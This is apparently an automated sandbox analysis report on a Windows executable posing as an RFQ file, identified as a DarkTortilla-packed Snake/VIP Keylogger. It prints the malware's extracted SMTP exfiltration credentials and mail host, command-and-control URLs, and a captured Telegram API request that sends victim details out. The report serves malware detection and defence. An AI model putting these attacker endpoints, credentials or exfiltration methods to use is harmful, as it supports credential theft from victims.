Windows Analysis Report
RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe

Overview

General Information

Sample name: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
Analysis ID: 1587370
MD5: 02bc82a10c674c5c8f60d293e22a544e
SHA1: 7b6aecdc2468eb633ddec37397e55fc778c824c2
SHA256: 8b672671606f402445e1d10caf2f59a41e36ae4201d189ac202f5c7c0c66f3a4
Tags: exe, user-julianmckein

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe" MD5: 02BC82A10C674C5C8F60D293E22A544E)
    • InstallUtil.exe (PID: 7968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Yara matches (memory dumps)

Source: 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_DarkTortilla | Description: Yara detected DarkTortilla Crypter | Author: Joe Security
Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_VIPKeylogger | Description: Yara detected VIP Keylogger | Author: Joe Security
Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown | Strings:
  • 0x2daa0:$a1: get_encryptedPassword
  • 0x2e028:$a2: get_encryptedUsername
  • 0x2d713:$a3: get_timePasswordChanged
  • 0x2d82a:$a4: get_passwordField
  • 0x2dab6:$a5: set_encryptedPassword
  • 0x307d2:$a6: get_passwords
  • 0x30b66:$a7: get_logins
  • 0x307be:$a8: GetOutlookPasswords
  • 0x30177:$a9: StartKeylogger
  • 0x30abf:$a10: KeyLoggerEventArgs
  • 0x30217:$a11: KeyLoggerEventArgsEventHandler
(22 entries in total; only the first 5 are shown)

Yara matches (unpacked PE files)

Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.42e56b0.2.unpack | Rule: JoeSecurity_DarkTortilla | Description: Yara detected DarkTortilla Crypter | Author: Joe Security
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.5620000.6.unpack | Rule: JoeSecurity_DarkTortilla | Description: Yara detected DarkTortilla Crypter | Author: Joe Security
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.42e56b0.2.raw.unpack | Rule: JoeSecurity_DarkTortilla | Description: Yara detected DarkTortilla Crypter | Author: Joe Security
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.5620000.6.raw.unpack | Rule: JoeSecurity_DarkTortilla | Description: Yara detected DarkTortilla Crypter | Author: Joe Security
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
(72 entries in total; only the first 5 are shown)
No Sigma rule has matched

Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-10T09:29:21.137570+0100  2803305  3         Unknown Traffic          192.168.2.4  49882        104.21.48.1      443               TCP
2025-01-10T09:29:24.456913+0100  2803305  3         Unknown Traffic          192.168.2.4  49906        104.21.48.1      443               TCP
2025-01-10T09:29:25.579354+0100  2803305  3         Unknown Traffic          192.168.2.4  49915        104.21.80.1      443               TCP
2025-01-10T09:29:26.637643+0100  2803305  3         Unknown Traffic          192.168.2.4  49923        104.21.80.1      443               TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-10T09:29:19.770796+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49871        193.122.130.0    80                TCP
2025-01-10T09:29:20.598929+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49871        193.122.130.0    80                TCP
2025-01-10T09:29:21.661416+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49885        193.122.130.0    80                TCP

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-10T09:29:29.795113+0100  1810007  1         Potentially Bad Traffic  192.168.2.4  49946        149.154.167.220  443               TCP

AV Detection

Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49877 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 0_2_080BA6DF
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] | 0_2_080BA6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 02A3F8E9h | 5_2_02A3F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 02A3FD41h | 5_2_02A3FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 06690D0Dh | 5_2_06690B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 06691697h | 5_2_06690B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 06692C19h | 5_2_06692968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 066931E0h | 5_2_06692DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669E501h | 5_2_0669E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669E0A9h | 5_2_0669DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669E959h | 5_2_0669E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669F209h | 5_2_0669EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669EDB1h | 5_2_0669EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669F661h | 5_2_0669F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 5_2_06690040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669FAB9h | 5_2_0669F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669D3A1h | 5_2_0669D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669CF49h | 5_2_0669CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669D7F9h | 5_2_0669D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 066931E0h | 5_2_0669310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 066931E0h | 5_2_06692DC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then jmp 0669DC51h | 5_2_0669D9A8

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49946 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.418f712.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4109562.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.414c642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2010/01/2025%20/%2014:05:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49885 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49871 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49906 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49882 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49915 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49923 -> 104.21.80.1:443
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49877 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 08:29:29 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: InstallUtil.exe, 00000005.00000002.2997558088.00000000061F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | String found in binary or memory: http://ocsp.sectigo.com0B
Source: InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478037027.0000000006850000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2478527754.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
